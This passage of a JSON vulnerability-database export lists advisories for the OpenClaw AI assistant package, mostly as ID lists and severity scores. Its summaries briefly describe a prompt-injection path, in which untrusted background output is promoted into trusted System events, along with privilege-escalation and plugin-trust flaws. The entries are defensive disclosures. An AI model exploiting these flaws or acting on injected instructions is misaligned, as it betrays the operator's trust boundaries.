                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"
                }
            ],
            "aliases": [
                "CVE-2026-35640",
                "GHSA-3h52-cx59-c456"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-4uqc-3h1c-4yhs"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89602?format=api",
            "vulnerability_id": "VCID-4urc-4536-pqhk",
            "summary": "OpenClaw: Lower-trust background runtime output is injected into trusted `System:` events, and local async exec completion misses the intended `exec-event` downgrade\n## Impact\n\nLower-trust background runtime output is injected into trusted `System:` events, and local async exec completion misses the intended `exec-event` downgrade.\n\nLower-trust runtime/background output could be promoted into trusted System events, allowing prompt-injection into later agent turns.\n\nOpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.4.2`\n- Patched versions: `2026.4.8`\n\n## Fix\n\nThe issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`.\n\n## Verification\n\nThe fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary.\n\n## Credits\n\nThanks @tdjackey for reporting.",
            "references": [
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-gfmx-pph7-g46x",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "7.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-gfmx-pph7-g46x"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-gfmx-pph7-g46x",
                    "reference_id": "GHSA-gfmx-pph7-g46x",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-gfmx-pph7-g46x"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109872?format=api",
                    "purl": "pkg:npm/openclaw@2026.4.8",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2g7x-vu14-nkde"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dqb2-dej7-augt"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-h9a4-1twb-d7d1"
                        },
                        {
                            "vulnerability": "VCID-hy24-6xpe-pkb7"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w2yd-uw91-9yck"
                        },
                        {
                            "vulnerability": "VCID-wyat-1259-2kg9"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.8"
                }
            ],
            "aliases": [
                "GHSA-gfmx-pph7-g46x"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-4urc-4536-pqhk"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90905?format=api",
            "vulnerability_id": "VCID-5atj-2a7b-57g5",
            "summary": "OpenClaw: Gateway `operator.write` can reach admin-only persisted `verboseLevel` via `chat.send` `/verbose`\n## Summary\n\nThe `chat.send` path let authorized write-scoped callers persist `/verbose` session overrides even though the same stored session mutation is admin-only through `sessions.patch`.\n\n## Impact\n\nA write-scoped gateway caller could persist verbose output for later runs and expose more reasoning or tool output than the operator intended.\n\n## Affected Component\n\n`src/auto-reply/reply/directive-handling.impl.ts, src/gateway/sessions-patch.ts`\n\n## Fixed Versions\n\n- Affected: `<= 2026.3.24`\n- Patched: `>= 2026.3.28`\n- Latest stable `2026.3.28` contains the fix.\n\n## Fix\n\nFixed by commit `c603123528` (`fix(gateway): require admin for persisted verbose defaults`).",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41344",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00086",
                            "scoring_system": "epss",
                            "scoring_elements": "0.24925",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00086",
                            "scoring_system": "epss",
                            "scoring_elements": "0.24857",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00086",
                            "scoring_system": "epss",
                            "scoring_elements": "0.24914",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41344"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/c6031235288a8d3bdf2243bd974340d8c8045bc2",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/c6031235288a8d3bdf2243bd974340d8c8045bc2"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-5h2w-qmfp-ggp6",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-24T16:47:02Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-5h2w-qmfp-ggp6"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41344",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41344"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-chat-send-verbose-parameter",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-24T16:47:02Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-chat-send-verbose-parameter"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-5h2w-qmfp-ggp6",
                    "reference_id": "GHSA-5h2w-qmfp-ggp6",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-5h2w-qmfp-ggp6"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109863?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.28",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"
                }
            ],
            "aliases": [
                "CVE-2026-41344",
                "GHSA-5h2w-qmfp-ggp6"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-5atj-2a7b-57g5"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89678?format=api",
            "vulnerability_id": "VCID-5rgx-2krs-guck",
            "summary": "OpenClaw: Workspace `.env` can override the bundled plugin trust root\n## Summary\nWorkspace `.env` can override the bundled plugin trust root\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: high\n- Assessment: v2026.3.28 still lets workspace .env override OPENCLAW_BUNDLED_PLUGINS_DIR, but critical is too high because exploitation still depends on attacker-controlled workspace loading, not a universal remote break.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `330a9f98cb29c79b1c16a2117e03d6276a0d6289` — 2026-03-31T19:25:12+09:00\n\nOpenClaw thanks @nexrin for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41396",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00014",
                            "scoring_system": "epss",
                            "scoring_elements": "0.02663",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00014",
                            "scoring_system": "epss",
                            "scoring_elements": "0.02716",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00014",
                            "scoring_system": "epss",
                            "scoring_elements": "0.02711",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41396"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "7.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
